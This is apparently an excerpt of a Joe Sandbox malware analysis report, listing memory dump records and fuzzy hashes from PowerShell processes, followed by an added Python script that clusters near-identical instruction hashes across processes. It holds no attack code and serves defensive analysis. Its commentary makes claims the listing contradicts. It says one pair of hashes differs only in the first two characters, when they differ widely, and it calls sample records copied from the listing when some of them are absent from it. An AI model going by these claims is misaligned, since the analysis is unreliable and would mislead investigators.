                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd34680000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L_^4$L_^7$L_^F$L_^J
                                                                          • API String ID: 0-3225005683
                                                                          • Opcode ID: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                                                          • Instruction ID: 3f7ac82a682a578a4f261a0f346ec01a207f207bf7c156ecb7e514b89dd2c68f
                                                                          • Opcode Fuzzy Hash: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                                                          • Instruction Fuzzy Hash: DD21D1B77086255ED2127BFDB8155EF3744CFE427934552B2D2989B053EE14608A8EE0
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2654782385.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd34660000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 65705ba84e6ba40c779da73c47177a8b33102b3a061cb198f5187f160382627a
                                                                          • Instruction ID: da2ad63b6792345bf230e632d25f6b9e0233dedf5d07e260886e29f263c7542f
                                                                          • Opcode Fuzzy Hash: 65705ba84e6ba40c779da73c47177a8b33102b3a061cb198f5187f160382627a
                                                                          • Instruction Fuzzy Hash: 8F311B3190CB484FDB189F5C9C4A6E9BBE0FBA9310F04416FE449D3252DA74A815CBC2
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2653407700.00007FFD3454D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3454D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd3454d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0c2486400f453fd80e0b20733a71fe865d8540b106ddc9f273d944cac12665dd
                                                                          • Instruction ID: 7aadf9f1fde13961a6ea5dc0f87e1908d1da661cadca943d1530bc82e5342fb6
                                                                          • Opcode Fuzzy Hash: 0c2486400f453fd80e0b20733a71fe865d8540b106ddc9f273d944cac12665dd
                                                                          • Instruction Fuzzy Hash: C241F57180DBC45FE7579B3998559623FF0EF53320B1505EFD088CB1A3D629A846C7A2
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2654782385.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd34660000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6a1066cb1ffd346408f818241e9272d54cc4932827990682fe804b8691b47daa
                                                                          • Instruction ID: d4a699b5c54e13cd463463a1bb2c708214e5693c8cab8088b912bd93f0e36b36
                                                                          • Opcode Fuzzy Hash: 6a1066cb1ffd346408f818241e9272d54cc4932827990682fe804b8691b47daa
                                                                          • Instruction Fuzzy Hash: 2A21F630A0C74C4FEB59DFAC9C8A7E97BF0EB96321F04416BD049C3156DA74A81ACB91
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2656198468.00007FFD34730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd34730000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 943147663f47a334521948211bee97546f5c0817a891e459c907f91b0ebaba83
                                                                          • Instruction ID: 50bfd79ec59efc5a111ed1e3617f555d399be25853106c8c70f801cd5ff54e8c
                                                                          • Opcode Fuzzy Hash: 943147663f47a334521948211bee97546f5c0817a891e459c907f91b0ebaba83
                                                                          • Instruction Fuzzy Hash: F1113AB2F0D6888FE7B5DA9844F55A877D1EF1A310F2440BFC24CC7193DA29A805C391
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2654782385.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd34660000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                          • Instruction ID: a87958a79b51de30136d2a5796adff37845468f6d091c294b1e8deaa73d43299
                                                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                          • Instruction Fuzzy Hash: 9501677121CB0C4FD744EF0CE451AA5B7E0FB95364F10056DE58AC3651DA36E892CB45
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2654782385.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd34660000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 64f340e5fa5a1f1ad3c053fabd04c1bfe01fe215ec25b7e0373f273111fd571e
                                                                          • Instruction ID: 908eb0566a3b4871c85d853432bc94b37bcc6dd0ba1e09a031baa78ec0c24562
                                                                          • Opcode Fuzzy Hash: 64f340e5fa5a1f1ad3c053fabd04c1bfe01fe215ec25b7e0373f273111fd571e
                                                                          • Instruction Fuzzy Hash: 7CF02B7AA08A9D4FCB41DF2C9C641E4BFA0FF76211B0501EBD648C7121D7649814CBC1
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2656198468.00007FFD34730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd34730000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7377ea72c7578ff46cf1081222fd25707dc23d9fa9446560a378df6fd1b6b514
                                                                          • Instruction ID: 436ffcf20d03ff0946f0cbe7ed23e8b41bbe6385fb04ff799762f97e0843a159
                                                                          • Opcode Fuzzy Hash: 7377ea72c7578ff46cf1081222fd25707dc23d9fa9446560a378df6fd1b6b514
                                                                          • Instruction Fuzzy Hash: F8F0BE72B0C9048FE769EA4CE4A18A873E0EF56320B2140BAE25DC7163DA29FC41C7C1
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2656198468.00007FFD34730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd34730000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1c537f85f89941f81ad1a137231bb707e2a9a174690990940100918fb6c4b00e
                                                                          • Instruction ID: 4cd8cb26284fda7c08a3518ab971f493df311dad618de45f940c39569d9c6dd2
                                                                          • Opcode Fuzzy Hash: 1c537f85f89941f81ad1a137231bb707e2a9a174690990940100918fb6c4b00e
                                                                          • Instruction Fuzzy Hash: A6F0BE72A0C5448FE758EA4CE4A58A877E0EF06324B2100B6E25DC7063DA2AFC50C7C1
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2656198468.00007FFD34730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd34730000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                          • Instruction ID: f8c6eb0e5f6b27e79384bdb8c578577e24f7652380f5b8b3b074d2831f300ad7
                                                                          • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                          • Instruction Fuzzy Hash: 24E01A31B0C818DFDAA8DA0CE0A09A973E1EB9932172101B7D24EC7561CA26FC519BC0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2654782385.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd34660000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: N_^8$N_^<$N_^?$N_^J$N_^K$N_^N$N_^Q$N_^Y
                                                                          • API String ID: 0-2388461625
                                                                          • Opcode ID: 0a17b3c452628a29204579af913d24a375679f0f8c5c8a70c7dd2c4491a07189
                                                                          • Instruction ID: 3569d94cc581b9e8d0cd901ce20fbfa7fb27dec4cb956bb45ac74a74776a635a
                                                                          • Opcode Fuzzy Hash: 0a17b3c452628a29204579af913d24a375679f0f8c5c8a70c7dd2c4491a07189
                                                                          • Instruction Fuzzy Hash: 2721D7B3B486254AC31137FCBC615EA6B85DFA437934501F3E258DF553DD18648B8A82
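What these records are good for is pivoting: the three PowerShell processes (5, 8 and 10, per the `_powershell.jbxd` snapshot names) carry functions whose Instruction Fuzzy Hashes are near-identical across processes (compare the hash for process 8 at 0x7FFD34680000 with the one for process 10 at 0x7FFD34660000; they differ only in the first two hex characters), which is the kind of evidence that the same JIT-compiled code is present in each. The script below is an added example, not Joe Sandbox code: it parses records in this listing's layout and groups near-identical instruction hashes across PIDs. The decoding of the `.sdmp` file name (first dotted field as hex PID, which agrees with the `hcaresult_10_...` naming for `0000000A`; fourth field as region base; fifth as page protection) and the position-agreement similarity metric are this example's assumptions, not documented Joe Sandbox semantics. The embedded records are copied from the listing above, trimmed to the fields used.

```python
"""Parse Joe Sandbox 'Memory Dump Source' records and cluster near-identical
Instruction Fuzzy Hashes across processes. Added example, not Joe Sandbox code:
the .sdmp name decoding and the similarity metric are this example's assumptions."""
from __future__ import annotations
import re
from dataclasses import dataclass

# Constructed sample: four records copied from the report listing, trimmed to the
# fields this example reads (the parser also tolerates the full record layout).
SAMPLE = """\
Memory Dump Source
• Source File: 00000005.00000002.2304446895.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
• Snapshot File: hcaresult_5_2_7ffd34690000_powershell.jbxd
Similarity
• API ID:
• String ID: K_^4$K_^5$K_^@$K_^N$K_^U$K_^Y
• API String ID: 0-4293504607
• Opcode ID: 16609c71894029b894e31eb0b6bb0f1b244423be56d9ce1e11d0e6353f0d3301
• Instruction Fuzzy Hash: C431F5B7B0C62A1ED6117AFCB8911EA6794DFE427A74547B7D288DB043CD18608B8A80
Memory Dump Source
• Source File: 00000008.00000002.2440355072.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
• Snapshot File: hcaresult_8_2_7ffd34680000_powershell.jbxd
• String ID:
• Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
• Instruction Fuzzy Hash: 2701677121CB0C4FD744EF0CE451AA5B7E0FB95364F10056DE58AC3651DA36E892CB45
Memory Dump Source
• Source File: 00000008.00000002.2440355072.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
• Snapshot File: hcaresult_8_2_7ffd34680000_powershell.jbxd
• String ID: L_^4$L_^7$L_^F$L_^J
• Opcode ID: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
• Instruction Fuzzy Hash: DD21D1B77086255ED2127BFDB8155EF3744CFE427934552B2D2989B053EE14608A8EE0
Memory Dump Source
• Source File: 0000000A.00000002.2654782385.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
• Snapshot File: hcaresult_10_2_7ffd34660000_powershell.jbxd
• String ID:
• Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
• Instruction Fuzzy Hash: 9501677121CB0C4FD744EF0CE451AA5B7E0FB95364F10056DE58AC3651DA36E892CB45
"""
FIELD_RE = re.compile(r"^\u2022?\s*([^:]+):\s*(.*)$")  # "• Key: value" lines

@dataclass
class DumpRecord:
    pid: int            # assumed: 1st dotted field of the .sdmp name, hex PID
    base: int           # assumed: 4th field, region base address
    protect: int        # assumed: 5th field, page protection (0x40 = PAGE_EXECUTE_READWRITE)
    snapshot: str
    string_ids: list[str]   # assumed: '$'-separated entries of "String ID"
    opcode_id: str
    instruction_fuzzy: str

def parse_records(text: str) -> list[DumpRecord]:
    """Split the listing on its record header and collect the bullet fields."""
    records = []
    for chunk in text.split("Memory Dump Source")[1:]:
        fields: dict[str, str] = {}
        for line in chunk.splitlines():
            m = FIELD_RE.match(line.strip())
            if m:
                fields[m.group(1).strip()] = m.group(2).strip()
        name = fields.get("Source File", "").split(",")[0]
        parts = name.split(".")
        if len(parts) < 5:
            continue  # not a .sdmp-style name; skip rather than guess
        sids = fields.get("String ID", "")
        records.append(DumpRecord(
            pid=int(parts[0], 16), base=int(parts[3], 16), protect=int(parts[4], 16),
            snapshot=fields.get("Snapshot File", ""),
            string_ids=sids.split("$") if sids else [],
            opcode_id=fields.get("Opcode ID", ""),
            instruction_fuzzy=fields.get("Instruction Fuzzy Hash", "")))
    return records

def hex_agreement(a: str, b: str) -> float:
    """Fraction of positions where two equal-length hex strings agree (assumed
    metric for this example, not Joe Sandbox's own similarity score)."""
    if not a or len(a) != len(b):
        return 0.0
    return sum(x == y for x, y in zip(a, b)) / len(a)

def cluster_by_fuzzy(records: list[DumpRecord], threshold: float = 0.9):
    """Greedy single pass: a record joins the first cluster whose representative
    Instruction Fuzzy Hash agrees with its own at >= threshold."""
    clusters: list[tuple[str, list[DumpRecord]]] = []
    for rec in records:
        for rep, members in clusters:
            if hex_agreement(rep, rec.instruction_fuzzy) >= threshold:
                members.append(rec)
                break
        else:
            clusters.append((rec.instruction_fuzzy, [rec]))
    return clusters

def cross_process_clusters(records: list[DumpRecord], threshold: float = 0.9) -> dict[str, list[int]]:
    """Clusters spanning more than one PID: the pivot for code that recurs in
    several spawned or injected processes."""
    out = {}
    for rep, members in cluster_by_fuzzy(records, threshold):
        pids = sorted({m.pid for m in members})
        if len(pids) > 1:
            out[rep] = pids
    return out

if __name__ == "__main__":
    print(cross_process_clusters(parse_records(SAMPLE)))
```

On the four embedded records this yields one cross-process cluster, the `2701…/9501…` pair shared by PIDs 8 and 10, while the two string-bearing functions from processes 5 and 8 stay separate. The 0.9 threshold is deliberately strict; lower it only after checking how many positions the hashes you compare actually share, since the metric treats every hex digit as equally significant.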